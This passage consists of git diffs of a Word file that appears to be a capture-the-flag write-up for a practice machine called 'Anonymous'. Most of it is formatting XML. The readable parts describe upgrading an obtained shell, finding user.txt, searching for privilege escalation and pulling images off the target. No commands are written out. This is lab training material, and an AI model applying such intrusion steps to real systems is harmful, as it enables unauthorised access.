+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
   </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="1">
+  <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:uiPriority w:val="0"/>
     <w:rPr>
-      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
-      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+      <w:lang w:eastAsia="zh-CN" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="2">
+  <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
     <w:semiHidden/>
-    <w:uiPriority w:val="0"/>
+    <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="3">
+  <w:style w:type="table" w:default="1" w:styleId="a1">
     <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
-    <w:uiPriority w:val="0"/>
+    <w:unhideWhenUsed/>
     <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblCellMar>
         <w:top w:w="0" w:type="dxa"/>
         <w:left w:w="108" w:type="dxa"/>
@@ -1050,6 +1570,23 @@
         <w:right w:w="108" w:type="dxa"/>
       </w:tblCellMar>
     </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="a2">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a3">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="a"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00483CA8"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>
@@ -1059,10 +1596,10 @@
   <a:themeElements>
     <a:clrScheme name="Office">
       <a:dk1>
-        <a:sysClr val="windowText" lastClr="000000"/>
+        <a:sysClr val="windowText" lastClr="FFFFFF"/>
       </a:dk1>
       <a:lt1>
-        <a:sysClr val="window" lastClr="FFFFFF"/>
+        <a:sysClr val="window" lastClr="000000"/>
       </a:lt1>
       <a:dk2>
         <a:srgbClr val="44546A"/>
@@ -1306,5 +1843,6 @@
     </a:fmtScheme>
   </a:themeElements>
   <a:objectDefaults/>
+  <a:extraClrSchemeLst/>
 </a:theme>
 </file>
--- a/THM_challenges/Medium/Anonymous/Anonymous_Solution_Documentation.docx
+++ b/THM_challenges/Medium/Anonymous/Anonymous_Solution_Documentation.docx
@@ -781,6 +781,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -845,6 +846,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1039,6 +1041,70 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t>I transformed this shell to full TTY using this command:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B69348D" wp14:editId="7E11D0AC">
+            <wp:extent cx="4038950" cy="140982"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="639037032" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="639037032" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4038950" cy="140982"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>And there I found the user.txt file</w:t>
       </w:r>
       <w:r>
@@ -1065,6 +1131,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1084,7 +1151,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1112,6 +1179,271 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Then, I continued this challenge by searching for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>way to escalate my privileges</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. I </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>found on that same directory, a folder named “pics” which contained these images:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475DB7B3" wp14:editId="715D216B">
+            <wp:extent cx="731583" cy="464860"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1931839280" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1931839280" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="731583" cy="464860"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>I downloaded them (using a simple python http server) to my machine and opened them:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>corgo2.jpg:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EC40B17" wp14:editId="0CFCDC1D">
+            <wp:extent cx="2459182" cy="1638468"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="683307380" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="683307380" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2465427" cy="1642629"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Puppos.jpeg:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Empty image</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">So, after examining these 2 images, I basically </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">understood </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">that </w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -1596,10 +1928,10 @@
   <a:themeElements>
     <a:clrScheme name="Office">
       <a:dk1>
-        <a:sysClr val="windowText" lastClr="FFFFFF"/>
+        <a:sysClr val="windowText" lastClr="000000"/>
       </a:dk1>
       <a:lt1>
-        <a:sysClr val="window" lastClr="000000"/>
+        <a:sysClr val="window" lastClr="FFFFFF"/>
       </a:lt1>
       <a:dk2>
         <a:srgbClr val="44546A"/>

--- a/THM_challenges/Medium/Anonymous/Anonymous_Solution_Documentation.docx
+++ b/THM_challenges/Medium/Anonymous/Anonymous_Solution_Documentation.docx
@@ -1053,6 +1053,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1224,6 +1225,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1286,6 +1288,97 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1808EF36" wp14:editId="29CDB985">
+            <wp:extent cx="2933954" cy="171465"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="219074122" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="219074122" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2933954" cy="171465"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F071AF8" wp14:editId="4B399BEB">
+            <wp:extent cx="5274310" cy="1170305"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="429809655" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="429809655" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1170305"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1351,7 +1444,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1402,48 +1495,394 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Empty image</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">So, after examining these 2 images, I basically </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">understood </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">that </w:t>
-      </w:r>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9308E5" wp14:editId="69D310DA">
+            <wp:extent cx="2467989" cy="1645227"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="1028790627" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1028790627" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2475244" cy="1650064"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>looked at</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> these images</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
